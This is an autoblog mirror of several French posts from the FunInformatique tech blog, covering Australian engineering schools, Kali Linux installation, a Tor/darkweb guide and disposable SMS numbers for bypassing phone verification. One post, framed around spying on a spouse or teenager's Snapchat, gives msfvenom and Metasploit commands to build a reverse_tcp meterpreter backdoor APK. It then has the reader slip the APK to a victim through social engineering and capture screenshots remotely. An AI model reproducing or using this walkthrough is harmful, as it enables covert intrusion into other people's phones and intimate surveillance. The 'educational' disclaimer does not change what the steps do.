PROJET AUTOBLOG


FunInformatique

Site original : FunInformatique

⇐ retour index

Mise à jour

Mise à jour de la base de données, veuillez patienter...

Les 3 meilleures écoles d’ingénieurs informatique en Australie

Friday 4 June 2021 à 15:09

L’Australie attire depuis longtemps des étudiants du monde entier en raison de son excellent enseignement technique. Il accueille environ 800 000 étudiants chaque année.

Le pays offre non seulement d’excellents programmes de premier cycle et des cycles supérieurs en génie informatique, mais offre également une variété de diplômes de certificat dans le domaine par le biais de ses instituts TAFE .

Toutes les écoles d’Australie ont une excellente réputation et rayonnent au point de vue international. Cependant, parmi les nombreux  écoles du pays, 3 sortent du lot.

Dans cet article, je partage avec vous les 3 meilleures écoles d’ingénieurs d’Australie. En outre, je vais réponde à différentes questions sur les études en Australie. ,

Quel est le coût des études d’ingénierie en Australie ?

Les études en Australie ont un coût important pour les étudiants français. Et à moins d’être boursier, vous devez payer les frais de scolarité requis pour votre programme d’ingénierie informatique.

Plusieurs critères sont à prendre en compte pour estimer le coût de votre formation en Australie :

Ainsi, en tant qu’étudiant international, vos frais de scolarité sont généralement complets. Pour un baccalauréat, le nombre pourrait être compris entre 20 000 et 45 000 AUD par an. Et les frais de scolarité pour une maîtrise et de doctorat tournent environ 22 000 à 50 000 AUD par an.

Visas étudiants

Pour étudier en Australie, vous devrez obtenir un visa pour l’Australie. Pour cela, vous devez être en mesure de prouver au ministère de l’Intérieur que vous remplissez les principales conditions de visa d’étudiant australien.

De quel visa avez-vous besoin ?

Le visa dont vous avez besoin dépend du type d’études que vous souhaitez effectuer et de la durée de votre séjour en Australie. Vous pouvez en savoir plus sur chaque type de visa sur le site Web du ministère australien de l’Immigration et de la Protection des frontières (DIBP).

Mais en bref, vous aurez généralement besoin de :

Enfin, pour en savoir plus sur les détails du processus de visa étudiant et ce dont vous avez besoin pour entrer dans le pays, regardez cet article: conditions relatives au visa pour l’Australie.

3 meilleurs écoles d’ingénieurs informatique en Australie

Vous trouverez ci-dessous la liste des 3 meilleures écoles informatique qui non seulement se classent parmi les meilleures en Australie, mais ont également une réputation mondiale à leur actif.

Université de Melbourne

L’université de Melbourne est aujourd’hui la première université d’Australie selon les classements mondiaux. Elle est située à Melbourne, la capitale de l’État du Victoria en Australie. C’est la deuxième plus ancienne université d’Australie et la plus ancienne du Victoria.

Melbourne est connue pour offrir aux étudiants une expérience bien plus qu’un simple apprentissage structuré. En matière de technologie, les diplômés de Melbourne sont une force à prendre en compte.

Elle compte plus de 40 000 étudiants encadrés par près de 6 000 enseignants.

Visitez l’université de Melbourne

Université de Nouvelle-Galles du Sud

l’UNSW, fondée en 1949, est considérée comme l’une des meilleures universités australiennes pour ses centres de recherches et d’enseignement dans de nombreux domaines.

Elle a été développée dans le but de répondre aux nouvelles exigences de la technologie en pleine croissance.

Les diplômés de l’université sont très recherchés par les employeurs et leurs salaires de début de carrière sont plus élevés que la moyenne australienne.

Constamment classée comme la principale faculté d’ingénierie informatique en Australie, leur enseignement créatif et leur apprentissage pratique façonnent leurs diplômés en futurs leaders de l’ingénierie.

Visitez l’université

Université de Sydney

Fondée en 1850, l’Université de Sydney est est la plus ancienne université d’Australie.

C’est une université de recherche ouverte, connue pour être l’une des meilleures universités du monde. En outre, elle a reçu une charte royale de la reine Victoria en 1858. Après avoir reçu la charte royale, les diplômes délivrés par l’université ont été reconnus comme égaux à ceux délivrés par les universités du Royaume-Uni.

Visitez l’université de Sysdney

The post Les 3 meilleures écoles d’ingénieurs informatique en Australie first appeared on FunInformatique.

Comment pirater un compte Snapchat ?

Monday 31 May 2021 à 20:46

Comment pirater Snapchat ? Voici une question que la plupart des utilisateurs de Snapchat se posent. Comment pirater un compte Snapchat pour savoir si mon conjoint est infidèle ? Comment pirater le compte Snapchat de mon ados pour contrôler ce que fait sur son smartphone ?

Bref, tout le monde à une bonne excuse de vouloir pirater un compte Snapchat.

La première chose que fait l’internaute, c’est généralement d’essayer de trouver la réponse en faisant une recherche Google.

Devinez quoi ? Et bien, sur toute la première page de résultat, on trouve une grande liste d’arnaqueurs qui promettent de récupérer des vidéos, des photos et des journaux de chat de n’importe quel compte Snapchat.

Un site frauduleux

Il y a des tas d’arnaques en tout genre sur la première page Google. Mais, désolé de vous dire que ces sites vous donne de faux espoirs.

Tous ces programmes sont créés dans le but de récupérer votre mot passe Snapchat, ou pour voler votre argent ou encore pour prendre le contrôle de votre smartphone.

Alors comment pirater un compte Snapchat ?

Un programme de piratage direct n’existe pas. En aucun cas, il n’y aura un miracle qui vous fera pirater une personne en deux minutes.

Cependant, il est impossible de garantir une sécurité à 100 %.  N’importe quel système peut être piraté.

Donc pour vraiment pirater un compte Snapchat, il faut être patient et intelligent. Si vous voulez des outils spécialisés, vous pouvez par exemple vous orienter vers la distribution Kali Linux.

Pirater un Snapchat avec l’outil Metasploit

Remarque: Cet article est à but éducatif et préventif uniquement. Apprendre l’attaque pour mieux se protéger. Vous êtes le seul(e) responsable de vos actions, et aucune responsabilité de la part de l’instructeur ne sera engagée quant à la mauvaise utilisation du contenu enseigné.

Cette technique consiste a exploiter les failles du système Android, iOS ou des applications installés dedans.

Chaque jour, des nouvelles failles de sécurité sont découverte sur les systèmes Android et iOS. Ces failles sont exploitable et permettent ainsi à une personne de prendre le contrôle total d’un smartphone ou d’une tablette.

Pour exploiter ces failles, un pirate crée une fausse application Android malveillante et l’envoie à une victime. Une fois l’application est installée sur le smartphone de la victime, il est facile de prendre le contrôlé de son smartphone et pirater son compte Snapchat.

Pour cela, les pirates utilisent l’outil Metasploit disponible sur la distribution Linux Kali linux.

Metasploit, c’est quoi ?

Metasploit est un outil qui permet le développement et l’exécution d’exploits contre un appareil distante. Il contient des centaines d’exploits et permettront d’attaquer tout type de machines connecté à internet.

Si vous voulez tester cette méthode sur votre téléphone et vous avez un ordinateur sous Windows alors je vous conseille créer une machine virtuel faisant tourner Kali Linux. Pour cela, il suffit de télécharger VMware et une image de Kali Linux. Metasploit est déjà pré-installé dessus.

Pour plus détails, regardez ce tutoriel: comment installer Kali Linux sur une machine Windows.

Commandes Linux pour pirater Snapchat

Création de l’application Backdoor.apk

Apres l’installation de Kali Linux sur votre machine, ouvrez le terminal Kali Linux. Ensuite, nous allons créé le trojan APK (c’est l’application que nous allons envoyer à la cible).

Pour cela, tapez la commande suivante:

msfvenom -p android / meterpreter / reverse_tcp lhost = 192.168.1.4 lport = 4000> /home/backdoor.apk

et appuyez sur Entrée. Cela créera un l’application APK backdoor.apk dans le dossier.

N’oubliez pas de replacer LHOST avec votre propre adresse IP.

Backdoor.apk est l’apk de piratage qui sera utilisé pour pirater le compte Snapchat d’une victime. Elle doit être installé sur le téléphone Android de la victime.

Vous pouvez envoyer ce fichier en utilisant divers sites Web de partage de fichiers comme Wetransfer (ce site Web ne nécessite pas d’enregistrement d’utilisateur).

Enfin, vous trouverez le backdoor.apk dans le répertoire Home.

Configuration de l’application Backdoor.apk

Maintenant, il faut configurer cette application Backdoor.apk. Pour cela, nous allons ouvrir un autre terminal et lancer l’outil Metasploit.

Ensuite, tapez les commandes suivantes:

msfconsole (permet d’ouvrir l’outil métasploit)
use /multi/handler (permet de sélectionner l’exploit handler)
set payload android/meterpreter/reverse_tcp
set lhost votre_adresse_ip
exploit

Voila le module est bien configuré, il reste maintenant d’envoyer l’APK à une victime en utilisant l’ingénierie sociale. Lorsque la victime installera l’application sur son mobile, Metasploit vous indiquera quelque chose comme ceci :

Il ne nous reste plus qu’à ouvrir une session Meterpreter à distance sur le mobile de la victime :

msf > sessions -i 1
[*] Starting interaction with 1…

Nous avons désormais le contrôle total du smartphone.  Par exemple : nous pouvons faire des captures d’écran de à distance de l’application Snapchat:

meterpreter > use espia
Loading extension espia…success.
meterpreter > screenshot snapchat.jpg

Conclusion

Pirater un compte Snapchat, n’est pas du tout une chose facile. Cette technique n’est pas fiable à 100%. Si la cible est bien protégé, vous n’aurez rien a faire.
J’espère qu’a travers ce tutoriel, vous avez bien compris comment fonctionne le piratage des applications Android ou iOS comme Snapchat.

Si vous avez des ajouts pour rendre cette page une base de donnée concernant Snapchat, n’hésitez pas à poster votre commentaire !

The post Comment pirater un compte Snapchat ? first appeared on FunInformatique.

Contourner la vérification par SMS sur n’importe quel site

Monday 31 May 2021 à 16:03

De nos jours, plusieurs sites sur le Web, nous demandent de leurs indiquer notre numéro de téléphone pour confirmer notre identité et pour compléter une simple inscription. Mais voilà, donner son vrai numéro de téléphone à des inconnu, peut poser quelques problèmes de vie privée.

Alors pourquoi utilisent-ils ce système qui nous oblige à délivre notre numéro de téléphone mobile ?

Bref, je ne sais rien. Par contre, je sais qu’il existe une parade à ça. Plutôt que de donner impunément votre numéro mobile, il existe une astuce pour contourner cette vérification par SMS.

Recourir à quelques services sur le web qui vous offrent des numéros de téléphones sur lesquels vous pouvez recevoir vos messages SMS.

Parmi ces services, je partage avec vous trois adresse que j’utilise personnellement :

Receive-smss

Receive-smss.com est un service gratuit de réception de SMS et de messages vocaux en ligne. Il n’est pas nécessaire de s’enregistrer. Sélectionnez simplement un numéro de téléphone dans la liste. Vous pouvez l’utiliser pour recevoir des messages de Facebook, Telegram, WeChat, VK, PayPal, AliPay et plus.

Accéder à receive-smss.com

GetFreesmsNumber

GetFreeSMSNumber.com est un service Gratuit pour recevoir des messages SMS temporaires et des messages vocaux en ligne.

Visitez getfreesmsnumber.com

SMS-Receive.net

SMS-Receive.net est un site Web qui contient des numéros de téléphone virtuels et des numéros de téléphone réels stockés sur les cartes SIM.

Le site Web fournit aux utilisateurs un service gratuit avec des numéros de téléphone publics où vous pouvez recevoir des SMS en ligne sur divers sites Web sociaux ou forums tels que: NAVERLINE, Yahoo , Microsoft, serverloft , CloudSigma, Facebook , Amazon, VK , OKru, Instagram , RealStatus etc.

Il est possible de confirmer votre inscription en utilisant ces numéros.

N’oubliez pas que tous les messages reçus sur ce service seront visibles par tous les visiteurs et ne pourront pas être supprimés.

contourner_sms-verification

L’avantage de SMS-Receive.net, c’est qu’il propose de nombreux numéros de tél, qui appartiennent à différents pays, très utile en cas de restriction que met en place certains sites web.

Accéder à SMS-Receive.net 

Comment contourner la vérification par SMS ?

verfication-sms

The post Contourner la vérification par SMS sur n’importe quel site first appeared on FunInformatique.

Comment installer Kali Linux sur Windows ? (Pour les débutants)

Friday 28 May 2021 à 18:14

Comme vous le savez, de temps à autres je partage avec vous des tutoriels sur l’Ethical Hacking. Dans ces tutoriels, je travaille souvent avec la distribution Kali Linux successeur de Backtrack.

Cependant, je me suis rendu compte que plusieurs de mes lecteurs ne savent pas encore comment installer Kali Linux sur leur machine tout en laissant Windows intact.

Aujourd’hui, j’ai décidé de rédiger un tutoriel sur comment installer Kali Linux sur votre machine Windows en utilisant le programme VirtualBox ou VMWare.

Comment vous le savez déjà, Kali Linux est le meilleur système d’exploitation pour les tests de pénétration. L’objectif de Kali Linux est de fournir une distribution regroupant l’ensemble des outils nécessaires aux tests de sécurité d’un système d’information.

Et VirtualBox et Vmware player sont des programmes qui utilisent la virtualisation. C’est une technique qui permet la création d’une ou plusieurs machines virtuelles au sein d’un même système d’exploitation (généralement Windows).

Il est possible de faire fonctionner plusieurs machines virtuelles en même temps, la limite correspondant aux performances de l’ordinateur hôte.

Installer Kali Linux sous Windows 10 et Windows 7 avec VirtualBox

Dans cette vidéo, je vais vous montrer comment installer Kali Linux avec Virtualbox sous Windows: étape par étape. Ceci est un guide détaillé sur l’installation de Kali Linux sur VirtualBox.

 

Créer une machine virtuelle Kali Linux sur Windows avec Vmware

Ici, nous allons voir comment installer Kali Linux sur votre système Windows avec le logiciel VMWare.

Etape 1:

Commencez par télécharger Vmware. VMWare player est gratuit mais pas libre, vous devrez quand même vous enregistrer pour générer une clé d’activation qui vous sera demandée lors de l’installation.

Ensuite télécharger le fichier ISO de kali linux. Le fichier occupe plus de 3 Go. On enregistre le fichier qui pourra être réutilisé dans un répertoire spécial nommé “Image disque” par exemple.

Une fois téléchargé Vmware, lancer l’installation en double cliquant sur l’exécutable. Continuer les étapes en cliquant sur Next Next, Finish. Vmware Player est désormais installé sur votre ordinateur. Ouvrez Vmware et cliquez sur “Create New Virtual Machine”.

Etape 2:

Sélectionnez “Installer disc image file (iso)”, ensuite sélectionnez le fichier ISO de kali linux que vous avez téléchargé. Cliquez sur “Next”.

Etape 3:

Dans cet étape, sélectionnez le type de système d’exploitation à installer puis entrez le nom de la machine virtuelle. Dans mon cas, je vais le nommer “Funinformatique Kali Linux”. Choisissez aussi la location, je vous recommande de créer un dossier nommé “Virtual machines” dans mes Documents. Ensuite cliquez sur Next.

Etape 4:
Après il faut sélectionnez la taille maximum de l’espace de stockage que vous souhaitez utiliser pour kali linux. Je recommande d’utiliser 30 GB. Apres changer l’option suivante à “Store virtual disk as a single file” et cliquez sur Next.

Etape 5:

Dans la fenêtre suivante, il faut configurer le matériel virtuelle que nous allons utilisé dans Kali linux. Donc cliquez sur le bouton “the Customize Hardware.

Kali-linux6

Sélectionnez “Memory”, et choisissez la taille de mémoire que vous souhaitez donner au système kali linux. Pour moi, comme je dispose 4 go dans mon ordinateur, je vais choisir 2 GB’s (2048 Mb’s).

Cliquez ensuite sur Network Adapter. Dans cette partie, nous allons a dire à Vmware d’utiliser la carte wifi de notre ordinateur.

Pour cela, sélectionner l’option Bridged et cliquez sur le bouton “Configure Adapters”.
Dans la nouvelle fenêtre, désélectionner tout sauf votre carte réseau WIFI et cliquez sur OK. Vous pouvez maintenant cliquer sur Fermer au bas de la fenêtre du matériel et cliquez sur Terminer.

Etape 6:

Félicitation ! Le nouveau fichier de machine virtuelle est maintenant bien configuré et il est ajouté à la bibliothèque VM.

Maintenant tout ce que vous reste à faire est démarrer votre machine virtuelle! Pour cela, cliquez sur le nom de la machine virtuelle nouvellement créée, puis cliquez sur Play virtual machine.

Apres le démarrage de votre machine virtuelle, vous aurez deux possibilités: soit lancer le système linux en live, soit l’installer sur le disque dur de la machine virtuelle.

Le mode live a la particularité de pouvoir lancer un système Linux sans installation sur le disque dur. L’avantage de  mode live c’est qu’il vous permet de tester le système avant de l’installer.

Son inconvénient, c’est qu’il n’est généralement pas possible de sauvegarder directement les modifications effectuées en cours de session. C’est a dire une fois que vous arrêter le système tous les document crées et les logiciels que vous auriez installer seront perdu.

Donc il est préférable de l’installer sur votre machine virtuelle.

Comment installer kali linux sous VMWARE ?

Etape 1:

Dans le boot menu de kali Linux, choisissez l’option “Graphic install” et cliquez sur Entrer. Dans la fenêtre suivant, il vous sera demandé de choisir la langue du système.

Etape 2:

Ensuite choisissez votre situation géographique. Apres il faut choisir la langue de votre clavier. Cliquer sur suivant, attendez quelques secondes, le temps que kali linux détecte le matériel de votre ordinateur. Ensuite vous auriez une fenêtre qui vous demande d’entrer le nom de votre machine. Entrez le nom qui vous convient le mieux/

Etape 3:

Kali Linux va maintenant vous demander d’entrer un mot de passe pour l’utilisateur root. Assurez-vous que vous pouvez facilement vous rappelez de ce mot de passe, si vous l’oubliez, vous devrez réinstaller Kali Linux. Cliquez sur continuer après que vous avez entré et ré-entré le mot de passe de votre choix.

Etape 4:
Ici, sélectionner l’option “Assisté – utiliser un disque entier” et cliquez sur continuer. Une autre fenêtre vous demandera de confirmer votre choix. Cliquez sur continuer.

Etape 5:

Ensuite sélectionner la première option “Tout dans une seule partition “. Cliquez sur continuer. Une autre fenêtre vous demandera de confirmer votre choix. Cliquez encore sur continuer.

Etape 6:

Dernière question! Confirmez que vous voulez vraiment faire ces changements en sélectionnant l’option Oui et en cliquant sur Continuer.

L’installation de Kali linux va maintenant commencer. En moyenne, l’installation prend 30 min.

Après quelques minutes, l’installateur vous demandera si vous souhaitez installer le chargeur de démarrage GRUB. Cliquez sur Oui et continuer. Enfin sélectionner dev/sda et cliquez sur continuer.

 Après le redémarrage, entrez le login (root) et le mot de passe.

Vous voilà avec Kali sur une machine virtuelle, prêts à tester vos réseaux.

The post Comment installer Kali Linux sur Windows ? (Pour les débutants) first appeared on FunInformatique.

Darkweb, TOR & Onions: Tout comprendre pour se lancer

Friday 21 May 2021 à 22:18

Lancé à l’origine par la marine américaine en 2002 pour protéger les communications du gouvernement américain, Tor domine depuis largement l’univers des réseaux darknet.

Il s’agit d’un réseau informatique qui permet de surfer anonymement grâce à un chiffrement multicouches.

Le projet est basée sur deux principes fortes:

Tor Browser, la porte d’entrée au darknet

La principale passerelle vers le Darknet est le navigateur Tor. Il s’agit d’une version de Firefox anonymisée et rendu compatible avec une navigation sur le darknet.

Le moyen le plus simple de parcourir les pages du darkweb est de télécharger et d’installer  le navigateur Tor.

Les URLs Tor se terminent par le suffixe .onion. Contrairement aux sites web public, les URL sont généralement complexes et difficiles à retenir, et les sites Web modifient fréquemment leurs URL.

On trouve avec Tor de nombreux marchés noirs (drogue, faux billet, faux papier, arme à feu), mais aussi des sites de militantisme politique, écologique, des ressources techniques, des plans d’impressions 3D, etc.

C’est quoi les adresses .Onion ?

La première fois que vous utilisez Tor Browser, vous avez l’impression d’utiliser un navigateur absolument normal, aux codes graphiques un peu plus dark.

Vous accédez à votre Internet et à vos services habituels sans limitation. Mais seul Tor Browser vous permet d’accéder à un second Internet, celui des adresses en .Onion. C’est le fameux darknet. Ces adresses ne fonctionnent pas en dehors de Tor.

Ces services onion permettent aux gens de naviguer et aussi de publier dans l’anonymat.

Le grand problème avec les URL des sites en .onion, c’est qu’ils sont constitués d’une longue suite de chiffres et de lettres aléatoirement choisis !

Par exemple, l’adresse onion du moteur de recherche DuckDuckGo sur Tor est: https://3g2upl4pq6kufc4m.onion

Installer et configurer le Navigateur Tor

Installation

Allez sur le site Torprojet.org, cliquez sur “Télécharger le navigateur Tor” ensuite Choisissez votre plateforme (Windows) et cliquez sur Télécharger. Rien de plus simple !

Une fois récupéré sur votre PC, lancez l’installation. A la fin de cette dernière, lancez simplement votre navigateur Tor en cliquant sur Fermer.

Configuration

Lors de la première ouverture, nous vous conseillons de passer par Configurer. Avant de vous connecter, une nouvelle fenêtre va vous proposer d’utiliser des “Ponts.

L’option obfs4 est le pont générique qui va connecter votre machine à un relais avant que Tor ne se connecte à Internet.

L’intérêt: même votre FAI ne saura pas que utilisez le protocole Tor. Ainsi vous évitez d’avoir l’impression d’être un suspect potentiel.

Attention, ces ponts ne sont pas des garanties tout risque, il existe un véritable chasse à ces relais pour les identifier.

Surfer anonyme

Si vous voyez Bienvenue dans le navigateur Tor, voilà vous êtes connecté. Vous avez accès à tout le Web traditionnel, mais aussi au réseau darknet en .onion.

Définir votre niveau de sécurité

Selon l’usage que vous faites de Tor, vous pousserez sa logique de protection à un niveau plus ou moins élevé.

Pour augmenter le niveau de sécurité du navigateur Tor, allez sur Menu puis cliquez sur Options ensuite sur Vie privée et Sécurité  et cliquez sur Sécurité, vous pourrez choisir entre trois niveaux préconfigurés.

Attention, plus vous sécuriserez Tor, plus vous désactivez des fonctions et modules permettant une navigation Internet fluide, la disponibilité de certains services ainsi que l’affichage de certains contenus.

Le niveau Normal : vous permettre d’utiliser Tor comme un navigateur classique tout en bénéficiant de l’anonymisation de son réseau/protocole.

Le niveau Plus sûr:  est le niveau suffisant pour bannir les sources principales de pistage et de scripts malveillants pouvant compromettre votre anonymat et vie privée.

Le niveau Le plus sûr: Ce niveau n’autorise que les fonctions de sites Web exigées pour les sites statiques et les services de base. Ces changements affectent les images, les médias et les scripts.

Les adresses darkweb à connaître

Onion.live

Les adresses .onion apparaissent et disparaissent régulièrement, tombent ou changent d’adresses sans prévenir ! Ce site répertorie les .onion toujours valides et populaires. Avec un indice de confiance attribué par les utilisateurs. On y trouve beaucoup de dark markets et donc de sources souvent illégales, mais le moteur de recherche vous permet de cibler tout centre d’intérêt légitime.

Moteurs de recherche

Le référencement naturel des sites en .onion n’existe pas.

Les bases de sites sont le plus souvent trouvées, classées; partagées et indexées à la main par les utilisateurs eux-mêmes ou par des services qui en ont fait leur activité.

Voici 5 moteurs de recherche incontournables:

Wiki

La bible pour tout comprendre , tout trouver, c’est The Hidden Wiki, le plus grand et ancien wiki sur Tor. Informations, documentations, liens .onion valides régulièrement mis à jour, il s’agit d’un incontournable.

Il existe plusieurs Hidden Wiki, qui apparaissent et disparaissent régulièrement sous forme de miroirs avec des contenus plus ou moins problématiques. Le lien du Hidden Wiki: http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page

Pour les journalistes

Secure Drop est un site .onion destiné à protéger les communications et transferts de documents entre lanceurs d’alerte de médias. De nombreux éditeurs proposent leur service .onion basé sur Secure Drop.

Adresse Secure Drop sur Tor: sdolvtfhatvsysc6l34d65ymdwxcujausv7k5jk4cy5ttzhjoi6fzvyd.onion

Pour en avoir plus de sites .onion, je vous invite à voir cet article: Les 10 sites .onion les plus visités au darknet.

Darknet et Darkweb, quelles différences ?

On confond souvent Darknet et le DarkWeb. On trouve des choses sur darknet, on surfe sur le DarkWeb. Mais où est la différence ?

En bref, le DarkWeb est un ensemble d’informations chiffrées, tandis que le Darknet est le réseau informatique intégrant des fonctions d’anonymisation qui permet de les transporter.

Pour plus de détails, regardez cet article: La différence entre le Darknet, le Darkweb, et le Deepweb.

Faut-il utiliser un VPN pour accéder à Tor ?

Les éditeurs de VPN financent de plus en plus de publicommuniqués et de campagnes d’affiliation sur les sites spécialisés pour promouvoir l’utilisation d’un VPN avec TOR.

Ce serait même, selon ces sites, indispensable pour garantir votre anonymat. La réalité est un peu plus complexe.

Un VPN pour masquer votre identité d’utilisateur TOR

Déjà, rappelons que Tor Browser n’est pas un VPN. Lorsque vous vous connectez à internet ou au réseau Tor avec ce navigateur, toutes vos informations habituelles passent par votre routeur internet (IP, agent utilisateur, etc.). C’est seulement une fois connecté que vous devenez anonyme.

Le protocole Tor étant identifiable, votre FAI pourra donc vous identifier comme un utilisateur régulier du darknet. Ce qui n’a rien de répréhensible en France, mais ce n’est pas le cas dans tous les pays. Qui plus est, pour ceux qui ont en horreur la suspicion généralisée envers les citoyens, sachez qu’un utilisateur Tor est souvent suspect par défaut.

Un VPN placé avant Tor browser vous permettra de disparaître complètement des radars et de redevenir un internaute lambda.

Afin d’apprendre sur le sujet, je vous invite à lire cet article: Combiner TOR et VPN est-il une bonne idée ?

Puis-je utiliser TOR sur un smartphone ?

Sur Android

Oui, il existe une version sur navigateur Tor proposée spécifiquement pour Android: Tor Browser pour Android.

Disponible auparavant sous forme d’APK, une version officielle est désormais disponible sur le Play Store depuis novembre dernier après de nombreux mois de développement.

Le projet Guardian fournir aussi l’application Orbot, disponible aussi sur le Play Store. Orbot est un proxy libre qui utilise TOR pour chiffrer votre trafic et le cacher en le faisant rebondir plusieurs fois au travers de différents ordinateurs répartis de par le monde.

Orbot peut donc être utilisé pour acheminer d’autres application sur votre appareil Android sur le réseau Tor. Cependant, seul le navigateur Tor pour Android est nécessaire pour naviguer sur le Web avec Tor.

Pour plus d’infos sur Orbot, regardez cet article: Comment accéder au darknet avec son téléphone Android ?

Sur iPhone

Il existe le navigateur Onion pour iOS, open source, qui s’appuie sur le routage de Tor.

Le projet Tor précise que son développeur est proche. Cependant, Apple exige que, sur iOS, les navigateurs utilisent un “Webkit” qui ne permet pas au navigateur Onion de proposer la même protection et confidentialité que la navigateur Tor pour PC.

Pour apprendre à accéder au darknet sur votre iPhone, regardez ce tutoriel: Darknet pour iPhone, comment y accéder ?

The post Darkweb, TOR & Onions: Tout comprendre pour se lancer first appeared on FunInformatique.

Unknown feed type?!